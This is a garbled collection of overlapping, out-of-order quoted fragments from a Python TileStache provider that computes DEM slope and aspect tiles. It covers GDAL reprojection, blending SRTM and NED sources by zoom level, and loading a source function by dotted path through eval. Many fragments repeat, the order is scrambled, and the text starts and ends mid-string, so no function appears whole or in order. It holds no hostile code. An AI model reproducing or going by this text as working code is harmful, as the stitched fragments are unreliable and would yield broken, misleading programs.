tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate", "load_func_path(funcpath): \"\"\" Load external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\"", "return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays", "+ window[8])) \\ / (8.0 * xres); y = ((window[6] + window[7] +", "requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough for now", "composite without the # current layer applied for later alpha-blending. # do_blending =", "needed. # if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without =", "be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider", "'TIFF': raise Exception('File format other than TIFF for slope and aspect: \"%s\"' %", "format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a", "bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] #", "0 for sheer face to pi/2 for flat ground. Aspect is returned in", "window[8]) \\ - (window[0] + window[1] + window[1] + window[2])) \\ / (8.0", "% format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns", "'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod,", "DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax", "on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres)", "width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z *", "be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer", "Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache provider", "xres, xres, 0, ymax - yres, 0, yres # # Reproject and merge", "[(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom -", "= mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform)", "wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif')", "\"\"\" Load external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname,", "top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom", "with PIL-like save() and crop() methods. This object knows only how to save", "= NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom)", "_func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came", "elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1", "TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from", "minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster", "proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with", ".. import save_slope_aspect # used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html", "* -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\"", "smaller than the input elevation array. Slope is returned in radians, from 0", "from 0 for sheer face to pi/2 for flat ground. Aspect is returned", "a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module", "source is a module such as SRTM1 or SRTM3, and the proportions must", "= demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise", "= cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a version of", "if dem_samples > area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic", "aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform def save(self,", "1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources and", "((window[0] + window[3] + window[3] + window[6]) \\ - (window[2] + window[5] +", "bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference", "datasets of the desired extent and projection. # xres = (xmax - xmin)", "SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for use", "== 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide,", "suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height),", "= choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source ==", "TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array", "xform): \"\"\" Instantiate with array of slope and aspect, and minimal geographic information.", "data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information", "for (mod, proportion) in providers]) == 1.0 # # Prepare information for datasets", "driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename,", "def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope", "pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list", "# in radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x +", "and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform", "__init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope and", "generating tiles of DEM slope and aspect data. Source parameter can be \"srtm-ned\"", "for information on how the Provider object interacts with TileStache. \"\"\" def __init__(self,", "and proportions for given zoom level. Each data source is a module such", "# if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1", "NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom,", "from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2", "= gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for", "VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import", "(module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox", "\"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(),", "slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on a path. Example", "+ window[7] + window[7] + window[8]) \\ - (window[0] + window[1] + window[1]", "= slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform", "from the current image. Box is a 4-tuple with left, upper, right, and", "import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from", "= NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return", "return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list", "return '.' class Provider: \"\"\" TileStache provider for generating tiles of DEM slope", "ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested area.", "SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like", "pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from", "+ window[1] + window[2])) \\ / (8.0 * yres); # in radians, from", "SRTM3, and the proportions must all add up to one. Return list has", "ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0,", "and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self,", "[(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers])", "ymax - yres, 0, yres # # Reproject and merge DEM datasources into", "= make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in", "self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom)", "Provider: \"\"\" TileStache provider for generating tiles of DEM slope and aspect data.", "area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic else: # cubic", "minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z =", "composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing down resample =", "return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top", "- 2, elevation.shape[1] - 2 window = [z * elevation[row:(row + height), col:(col", "only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how", "NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1,", "back to pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\"", "buffered_xform = xmin - xres, xres, 0, ymax - yres, 0, yres #", "in product(range(3), range(3))] x = ((window[0] + window[3] + window[3] + window[6]) \\", "\"\"\" Starting point for DEM retrieval utilities. \"\"\" from math import pi, sin,", "sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat,", "slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin,", "SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform):", "difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a", "save() and crop() methods. This object knows only how to save two-band 8-bit", "information on how the Provider object interacts with TileStache. \"\"\" def __init__(self, layer,", "unlink, close from itertools import product from tempfile import mkstemp from sys import", "gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height,", "to pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load", "= osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled", "Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] -", "#return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif", "http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window =", "tempfile import mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3,", "and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat,", "north back to pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath):", "Set up some useful projections. # osr.UseExceptions() # <-- otherwise errors will be", "webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended", "width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of", "if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1 -", "without the # current layer applied for later alpha-blending. # do_blending = bool(proportion_complete", "yres) # # Keep a version of the composite without the # current", "slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save()", "= xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform)", "such as SRTM1 or SRTM3, and the proportions must all add up to", "+ window[3] + window[3] + window[6]) \\ - (window[2] + window[5] + window[5]", "format other than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect,", "import numpy from .. import save_slope_aspect # used to prevent clobbering in /vsimem/,", "!= 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin,", "the composite without the # current layer applied for later alpha-blending. # do_blending", "None # # Perform alpha-blending if needed. # if do_blending: proportion_with = proportion", "for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only':", "by one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres,", "= driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999,", "= xmin - xres, xres, 0, ymax - yres, 0, yres # #", "down resample = gdal.GRA_Cubic else: # cubic spline looks better stretching out resample", "and aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers", "config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return", "counterclockwise from -pi at north around to pi. Logic here is borrowed from", "+= proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and", "TileStache.Caches import Disk from osgeo import gdal, osr from PIL import Image import", "= load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0 # #", "# current layer applied for later alpha-blending. # do_blending = bool(proportion_complete > 0", "cubic looks better squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks", "demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source def", "SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for", "http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with TileStache. \"\"\" def", "''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds", "response object with PIL-like save() and crop() methods. This object knows only how", "# osr.UseExceptions() # <-- otherwise errors will be silent and useless. webmerc_proj =", "osr.UseExceptions() # <-- otherwise errors will be silent and useless. webmerc_proj = SphericalMercator()", "height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect", "do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem", "layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source", "terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)]", "= NED1km, NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return", "# estimate the raster density across source DEM and output dem_samples = (maxlon", "pi/2 for flat ground. Aspect is returned in radians, counterclockwise from -pi at", "objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if", "area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref,", "\"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of", "window[3] + window[3] + window[6]) \\ - (window[2] + window[5] + window[5] +", "= SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks", "proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon,", "1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom <", "NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom >=", "tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache", "SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return", "== SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3,", "NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions for", "radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) #", "zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom <", "ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs,", "module.datasources(*ds_args): # estimate the raster density across source DEM and output dem_samples =", "zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top =", "= [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers", "useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible", "implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources", "Reproject and merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds", "ds_dem = None # # Perform alpha-blending if needed. # if do_blending: proportion_with", "in radians, counterclockwise from -pi at north around to pi. Logic here is", "crop(self, box): \"\"\" Returns a rectangular region from the current image. Box is", "import Configuration from TileStache.Caches import Disk from osgeo import gdal, osr from PIL", "1.0 # # Prepare information for datasets of the desired extent and projection.", "ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation,", "from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in", "self.xform = xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF to", "__init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config", "(ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres,", "1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom))", "/ difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return", "1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km,", "output file-like object. \"\"\" if format != 'TIFF': raise Exception('File format other than", "proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data", "height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999)", "+ window[5] + window[5] + window[8])) \\ / (8.0 * xres); y =", "NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom,", "return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top", "- float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom,", "xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect:", "0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response", "= [z * elevation[row:(row + height), col:(col + width)] for (row, col) in", "'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\"", "window[5] + window[8])) \\ / (8.0 * xres); y = ((window[6] + window[7]", "Save a two-band GeoTIFF to output file-like object. \"\"\" if format != 'TIFF':", "1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 -", "\"\"\" Returns a rectangular region from the current image. Box is a 4-tuple", "# driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete =", "None # # Calculate and save slope and aspect. # slope, aspect =", "to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect", "buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs =", "alpha-blending if needed. # if do_blending: proportion_with = proportion / (proportion_complete + proportion)", "= calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres return", "yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object", "and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres,", "= xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF to output", "left, upper, right, and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def", "as SRTM1 or SRTM3, and the proportions must all add up to one.", "(mod, proportion) in providers]) == 1.0 # # Prepare information for datasets of", "SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top =", "zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom <", "NED1km, NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m,", "providers]) == 1.0 # # Prepare information for datasets of the desired extent", "save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular", "proportion_complete = 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) #", "flat ground. Aspect is returned in radians, counterclockwise from -pi at north around", "= cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax +", "self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from the current image.", "NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom,", "resample) ds_dem = None # # Perform alpha-blending if needed. # if do_blending:", "one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin", "# xres = (xmax - xmin) / width yres = (ymin - ymax)", "= composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope and", "'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif", "unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope and aspect. #", "aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and", "crop() methods. This object knows only how to save two-band 8-bit GeoTIFFs. See", "with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir", "save(self, output, format): \"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\"", "height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs", "in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by", "module.sref) # get a lat/lon bbox buffered by one pixel on all sides", "== 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for", "# get a lat/lon bbox buffered by one pixel on all sides minlon,", "This object knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for", "zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m", "= NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom <", "Load external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname", "composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation =", "import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo", "= eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up", "or SRTM3, and the proportions must all add up to one. Return list", "ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays 2", "1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir", "/ (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() *", "NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom", "proportions for given zoom level. Each data source is a module such as", "given zoom level. Each data source is a module such as SRTM1 or", "otherwise errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference()", "+ window[2])) \\ / (8.0 * yres); # in radians, from 0 to", "+ window[3] + window[6]) \\ - (window[2] + window[5] + window[5] + window[8]))", "from itertools import product from tempfile import mkstemp from sys import modules import", "import gdal, osr from PIL import Image import numpy from .. import save_slope_aspect", "self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP,", "from math import pi, sin, cos from os import unlink, close from itertools", "xres, 0, ymax - yres, 0, yres # # Reproject and merge DEM", "enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source ==", "4-tuple with left, upper, right, and lower pixels. Not yet implemented! \"\"\" raise", "sin, cos from os import unlink, close from itertools import product from tempfile", "- float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom):", "of DEM slope and aspect data. Source parameter can be \"srtm-ned\" (default) or", "http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with TileStache. \"\"\" def", "top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1", "good enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source", "xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF to output file-like", "ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if needed. #", "current layer applied for later alpha-blending. # do_blending = bool(proportion_complete > 0 and", "choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions for given zoom", "radians, from 0 for sheer face to pi/2 for flat ground. Aspect is", "window[3] + window[6]) \\ - (window[2] + window[5] + window[5] + window[8])) \\", "elevation array. Slope is returned in radians, from 0 for sheer face to", "[(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers =", "0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # #", "proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation", "raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax,", "on how the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope,", "will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class", "self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform", "1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver =", "format != 'TIFF': raise Exception('File format other than TIFF for slope and aspect:", "webmerc_proj.srs # <-- good enough for now if self.source == 'srtm-ned': providers =", "from tempfile import mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1,", "Return list has either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom:", "def choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions for given", "save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object", "SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from", "items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom", "= SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom)", "a rectangular region from the current image. Box is a 4-tuple with left,", "== 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)]", "and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\"", "of the composite without the # current layer applied for later alpha-blending. #", "self.wkt = wkt self.xform = xform def save(self, output, format): \"\"\" Save a", "0, yres # # Reproject and merge DEM datasources into destination datasets. #", "difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) /", "to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height =", "desired extent and projection. # xres = (xmax - xmin) / width yres", "Aspect is returned in radians, counterclockwise from -pi at north around to pi.", "class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for", "- (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)]", "Configuration from TileStache.Caches import Disk from osgeo import gdal, osr from PIL import", "- numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at north back", "a list of data sources and proportions for given zoom level. Each data", "north around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width,", "at north around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\"", "# # 